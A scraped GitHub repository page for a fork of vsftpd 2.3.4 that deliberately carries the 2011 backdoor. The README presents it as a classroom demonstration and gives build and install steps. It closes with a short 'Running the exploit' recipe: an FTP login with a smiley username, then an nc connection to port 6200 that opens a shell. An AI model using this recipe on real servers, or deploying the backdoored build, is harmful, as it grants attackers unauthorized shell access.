Thanks to visit codestin.com
Credit goes to Github.com

Skip to content
/ vsftpd-2.3.4 Public
forked from lyndon160/vsftpd-backdoor

This repository is a version of vsftpd-2.3.4 with the backdoor patch included. To be used as an example to demonstrate backdoor entry into another system.

License

View license
10 stars 11 forks Branches Tags Activity
Star
Notifications You must be signed in to change notification settings

DoctorKisow/vsftpd-2.3.4

BranchesTags
 
 

Folders and files

NameName
Last commit message
Last commit date

Latest commit

 

History

9 Commits
EXAMPLE
EXAMPLE
 
 
RedHat
RedHat
 
 
SECURITY
SECURITY
 
 
dummyinc
dummyinc
 
 
port
port
 
 
xinetd.d
xinetd.d
 
 
AUDIT
AUDIT
 
 
BENCHMARKS
BENCHMARKS
 
 
BUGS
BUGS
 
 
COPYING
COPYING
 
 
COPYRIGHT
COPYRIGHT
 
 
Changelog
Changelog
 
 
FAQ
FAQ
 
 
INSTALL
INSTALL
 
 
LICENSE
LICENSE
 
 
Makefile
Makefile
 
 
README.md
README.md
 
 
README.security
README.security
 
 
README.ssl
README.ssl
 
 
REFS
REFS
 
 
REWARD
REWARD
 
 
SIZE
SIZE
 
 
SPEED
SPEED
 
 
TODO
TODO
 
 
TUNING
TUNING
 
 
access.c
access.c
 
 
access.h
access.h
 
 
ascii.c
ascii.c
 
 
ascii.h
ascii.h
 
 
banner.c
banner.c
 
 
banner.h
banner.h
 
 
builddefs.h
builddefs.h
 
 
defs.h
defs.h
 
 
features.c
features.c
 
 
features.h
features.h
 
 
filesize.h
filesize.h
 
 
filestr.c
filestr.c
 
 
filestr.h
filestr.h
 
 
ftpcmdio.c
ftpcmdio.c
 
 
ftpcmdio.h
ftpcmdio.h
 
 
ftpcodes.h
ftpcodes.h
 
 
ftpdataio.c
ftpdataio.c
 
 
ftpdataio.h
ftpdataio.h
 
 
ftppolicy.c
ftppolicy.c
 
 
ftppolicy.h
ftppolicy.h
 
 
hash.c
hash.c
 
 
hash.h
hash.h
 
 
infection.diff
infection.diff
 
 
ipaddrparse.c
ipaddrparse.c
 
 
ipaddrparse.h
ipaddrparse.h
 
 
logging.c
logging.c
 
 
logging.h
logging.h
 
 
ls.c
ls.c
 
 
ls.h
ls.h
 
 
main.c
main.c
 
 
netstr.c
netstr.c
 
 
netstr.h
netstr.h
 
 
oneprocess.c
oneprocess.c
 
 
oneprocess.h
oneprocess.h
 
 
opts.c
opts.c
 
 
opts.h
opts.h
 
 
parseconf.c
parseconf.c
 
 
parseconf.h
parseconf.h
 
 
postlogin.c
postlogin.c
 
 
postlogin.h
postlogin.h
 
 
postprivparent.c
postprivparent.c
 
 
postprivparent.h
postprivparent.h
 
 
prelogin.c
prelogin.c
 
 
prelogin.h
prelogin.h
 
 
privops.c
privops.c
 
 
privops.h
privops.h
 
 
privsock.c
privsock.c
 
 
privsock.h
privsock.h
 
 
ptracesandbox.c
ptracesandbox.c
 
 
ptracesandbox.h
ptracesandbox.h
 
 
readwrite.c
readwrite.c
 
 
readwrite.h
readwrite.h
 
 
secbuf.c
secbuf.c
 
 
secbuf.h
secbuf.h
 
 
secutil.c
secutil.c
 
 
secutil.h
secutil.h
 
 
session.h
session.h
 
 
ssl.c
ssl.c
 
 
ssl.h
ssl.h
 
 
sslslave.c
sslslave.c
 
 
sslslave.h
sslslave.h
 
 
standalone.c
standalone.c
 
 
standalone.h
standalone.h
 
 
str.c
str.c
 
 
str.h
str.h
 
 
strlist.c
strlist.c
 
 
strlist.h
strlist.h
 
 
sysdeputil.c
sysdeputil.c
 
 
sysdeputil.h
sysdeputil.h
 
 
sysstr.c
sysstr.c
 
 
sysstr.h
sysstr.h
 
 
sysutil.c
sysutil.c
 
 
sysutil.h
sysutil.h
 
 
tcpwrap.c
tcpwrap.c
 
 
tcpwrap.h
tcpwrap.h
 
 

Repository files navigation

vsftpd-2.3.4

Preserved here for my students, review this for hints on how to remotely access the final project server.

This is a backdoored version of vsftpd which has been packaged and configured for the convience of performing an example backdoor into a system. vsftpd is an FTP server which was created by Chris Evans and is available at vsftpd.beasts.org, this repo uses version 2.3.4.

This backdoor which was maliciously added to the archive was introduced into the vsftpd-2.3.4 2011 but has since been removed, thus the reason for this repository.

The source for vsftp was https://security.appspot.com/downloads/vsftpd-2.3.4.tar.gz and the diff used in this repo was taken from http://pastebin.com/AetT9sS5.

Changes

  • vsftpd.conf to allow remote user login.
  • Make file to work with patch.
  • Core code, which now includes patch.

Requirements

These installation details are for ubuntu but should be able to be adapted for most distros.

 apt-get install build-essential
 apt-get install libpam0g-dev

Installation

Create users for use with FTP. May not have to do this if you previously used apt-get for vsftpd.

git https://github.com/DoctorKisow/vsftpd-2.3.4.git
cd vsftpd-2.3.4

# Required by the Ubuntu 20.04.06 LTS Compiler
chmod +x vsf_findlibs.sh

# Add "-lpam" to the end of the LIBS line at the top; then save.
nano Makefile
install -v -d -m 0755 /var/ftp/empty
install -v -d -m 0755 /home/ftp
groupadd -g 47 vsftpd
groupadd -g 48 ftp
useradd -c "vsftpd User"  -d /dev/null -g vsftpd -s /bin/false -u 47 vsftpd
useradd -c anonymous_user -d /home/ftp -g ftp    -s /bin/false -u 48 FTP
# Use make to create the executable.
make
# Install vsftpd and its modified configurations.

install -v -m 755 vsftpd        /usr/sbin/vsftpd
install -v -m 644 vsftpd.8      /usr/share/man/man8
install -v -m 644 vsftpd.conf.5 /usr/share/man/man5 
install -v -m 644 vsftpd.conf   /etc

Running the exploit

  1. On one node run vsftpd
  2. On another node connected to the network login to the server by using: ftp <server address>
  3. Once connected use the username 'x:)' with any password.
  4. Once the terminal hangs open another terminal and use nc <server address> 6200 and you're in!

About

This repository is a version of vsftpd-2.3.4 with the backdoor patch included. To be used as an example to demonstrate backdoor entry into another system.

Resources

Readme

License

View license
Activity

Stars

10 stars

Watchers

0 watching

Forks

3 forks
Report repository

Releases

No releases published

Packages

No packages published

Languages

  • C 92.6%
  • Roff 6.7%
  • Other 0.7%